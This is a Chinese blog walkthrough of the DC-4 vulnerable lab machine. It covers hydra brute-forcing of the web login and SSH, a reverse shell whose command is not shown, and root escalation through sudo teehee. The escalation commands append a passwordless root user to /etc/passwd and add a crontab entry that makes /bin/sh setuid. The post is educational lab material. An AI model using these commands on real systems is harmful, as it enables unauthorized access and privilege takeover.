DC4渗透测试过程

最新推荐文章于 2024-07-29 09:22:32 发布
最新推荐文章于 2024-07-29 09:22:32 发布
阅读量400 收藏 8
点赞数 5
文章标签: web安全 网络安全 web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_63523232/article/details/139937186
版权

DC4渗透测试

*测试范围*

*序号**系统名称**地址**权限*
1DC1192.168.57.91普通用户

kali扫描网段

netdiscover -i eth0 -r 192.168.57.0/24

在这里插入图片描述

在这里插入图片描述

有一个登录界面

爆破用户密码

用yakit爆破

在这里插入图片描述

爆破到密码为happy

在这里插入图片描述

登录发现可以执行命令

在这里插入图片描述

也可以用hydra爆破

hydra -l admin -P /usr/share/wordlists/rockyou.txt.gz 192.168.165.91 http-post-form "/login.php:username=^USER^&password=^PASS^:S=logout" -F

抓包修改命令反弹shell

kali监听

在这里插入图片描述

在这里插入图片描述

拿到了权限www-data

在这里插入图片描述

提权

cat /etc/passwd | grep '/bin/bash'

在这里插入图片描述

三个有root权限的用户

查看三个用户目录发现jim有个密码字典

在这里插入图片描述

有个mbox文件只有jim可以读

在这里插入图片描述

通过得到的字典爆破ssh

hydra -l jim -P out.txt -t 10 -vV -e ns -o save.log 192.168.57.91 ssh

在这里插入图片描述

得到了jim的密码

ssh连接

在这里插入图片描述

查看mbox,是邮件

在这里插入图片描述

mail命令得到了charles 的密码

在这里插入图片描述

在这里插入图片描述

切换登录charles

在这里插入图片描述

sudo -l 发现teehee命令可以直接sudo

在这里插入图片描述

teehee 可以将标准输入复制到我们选择的文件中。那么我可以直接写一个 root 权限的用户到 /etc/passwd 下,也可以直接在 sudoers 里给 charles 所有权限

直接加个用户到/etc/passwd

echo "root2::0:0:::/bin/sh" | sudo teehee -a /etc/passwd

在这里插入图片描述

提权成功

也可以定时任务

echo "****root chmod 4777 /bin/sh" | sudo teehee -a /etc/crontab

获得flag

在这里插入图片描述

echo “****root chmod 4777 /bin/sh” | sudo teehee -a /etc/crontab


获得flag

[外链图片转存中...(img-c4eA37Ji-1719230764034)]
一个人的愿望
关注
  • 5
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
DC-4靶机渗透测试详细教程
啊醒的博客
05-04 3857
DC-4靶机渗透测试详细教程
DC-4靶机渗透测试
qq_60463414的博客
07-07 2375
DC4靶机shell反弹,提权流程。
DC-1完整的渗透测试过程
weixin_51097397的博客
06-29 961
1.此次DC-1的渗透用到了如下几种工具的基础使用①namp②whatweb④hydra2.其中用到了python getshell的方法3.数据库的基本使用(增删改查)4.linux的基本命令,尤其是suid提权find的用法} \;这些基本的操作用法我非常不熟,需要经常练习去掌握。!!
【vulnhub】DC系列之DC-4渗透测试
Hi~ 土拨鼠
12-28 459
文章目录一、实验环境二、实验要求三、渗透过程 一、实验环境 目标靶机:DC-4,NAT模式 攻击机:kali,NAT模式,IP:192.168.35.131 二、实验要求 拿到唯一一个flag就ok! 三、渗透过程 信息收集: 使用nmap扫描存活主机: nmap -sP 192.168.35.0/24 -oN nmap.sP 得到靶机IP:192.168.35.151 端口扫描及版本探测: nmap -sV 192.168.35.151 -O -p 1-65535 -oN nmap.sV 发现开放了
DC-4-Web渗透测试靶机
01-19
总之,DC-4-Web渗透测试靶机提供了一个安全的实验平台,让学习者可以在不危害实际系统的情况下,深入理解Web渗透测试的全过程,增强网络安全防护意识和技能。在使用过程中,不断学习、实践和总结,将有助于你在网络...
dc-2靶机练习.pdf
01-02
详细的靶机dc-2练习过程,思路明确,条例清晰, 通过修改hosts进入网站,发现flag1 通过cewl工具对网站生成密码字典,使用wpscan进行密码爆破得到jerry,tom账号密码,登录后台得到flag2 端口扫描发现ssh服务开...
软件测试100道.zip
03-27
- 渗透测试:模拟攻击,验证系统防护能力。 - 数据隐私保护:确保用户数据的安全存储和传输。 8. **敏捷与持续集成** - 敏捷测试:采用敏捷开发方法时的测试实践,强调迭代和快速反馈。 - 持续集成:频繁集成...
域渗透技术详解
06-10
作者Wilson表示,在没有合适的域环境的情况下很难开展实际的渗透测试工作。鉴于此,他通过自己的实践搭建了一个用于学习和测试的域环境。 **2. 搭建DNS+域服务器** 搭建域环境的第一步是搭建DNS服务器。DNS服务器...
ctf-dc
03-12
3. **Web安全**:包括SQL注入、XSS攻击、CSRF等,Python的requests库可以用来模拟HTTP请求, Burp Suite插件可以辅助进行Web渗透测试。 4. **取证分析**:参赛者需要从日志、内存快照、硬盘镜像中寻找线索。Python...
《“微软蓝屏”敲响警钟:网络安全与系统稳定何去何从》
2302_77186925的博客
07-24 1725
“微软蓝屏”事件暴露了网络安全哪些问题
非科班出身的你,如何转行web安全工程师?零基础入门到精通,收藏这一篇就够了
Python_paipai的博客
07-29 310
因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取。因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取。因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取。那么,转行web安全工程师,你需要掌握哪些技能呢?对web安全工程师很感兴趣。对现在的工作没有热情。
“微软蓝屏“事件暴露了网络安全哪些问题?
程序员-张师傅
07-23 945
微软蓝屏事件,尤其是2024年7月19日发生的全球性Windows系统崩溃事件,带来了多方面的深刻教训。
网络安全相关竞赛比赛
黑战士的博客
07-18 1203
湖南省委网信办联合省教育厅、省广播电视局、省政务管理服务局、省通信管理局、长沙市人民政府等6家单位共同主办。教育部认可的大学生学科竞赛网站链接(2023版)关键字:比赛、CTF、赛事、技能挑战。浙江省大学生网络与信息安全竞赛。全国网络安全行业职业技能大赛。湖南省“网安湘军杯”
网络安全之不同阶段攻防手段(四)
子非渔
07-25 392
前面已经说过信息收集、扫描探测以及初始访问阶段的攻防手段,下面将说一下在攻击者获取到访问权限的情况下会接着如何进一步在网络中建立控制点、提权、横移以及完成攻击后的遗迹隐藏
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8352
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
方案-基于云架构的校园信息化建设方案.pdf
最新发布
07-29
方案-基于云架构的校园信息化建设方案.pdf
【创新未发表】Matlab实现蛇群优化算法SO-Kmean-Transformer-LSTM负荷预测算法研究.rar
07-29
1.版本:matlab2014/2019a/2021a 2.附赠案例数据可直接运行matlab程序。 3.代码特点:参数化编程、参数可方便更改、代码编程思路清晰、注释明细。 4.适用对象:计算机,电子信息工程、数学等专业的大学生课程设计、期末大作业和毕业设计。 5.作者介绍:某大厂资深算法工程师,从事Matlab算法仿真工作10年;擅长智能优化算法、神经网络预测、信号处理、元胞自动机等多种领域的算法仿真实验,更多仿真源码、数据集定制私信+。 替换数据可以直接使用,注释清楚,适合新手
【创新未发表】Matlab实现北方苍鹰优化算法NGO-Kmean-Transformer-LSTM组合状态识别算法研究.rar
07-29
1.版本:matlab2014/2019a/2021a 2.附赠案例数据可直接运行matlab程序。 3.代码特点:参数化编程、参数可方便更改、代码编程思路清晰、注释明细。 4.适用对象:计算机,电子信息工程、数学等专业的大学生课程设计、期末大作业和毕业设计。 5.作者介绍:某大厂资深算法工程师,从事Matlab算法仿真工作10年;擅长智能优化算法、神经网络预测、信号处理、元胞自动机等多种领域的算法仿真实验,更多仿真源码、数据集定制私信+。 替换数据可以直接使用,注释清楚,适合新手
内网安全攻防实战:渗透测试与法规解析
"内网安全攻防渗透测试实战指南.pptx" 内网安全攻防是信息安全领域的一个重要部分,特别是在企业、政府机构和其他组织中,内网通常包含大量敏感数据和关键系统。渗透测试是对内网安全性进行评估的一种方法,目的是...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值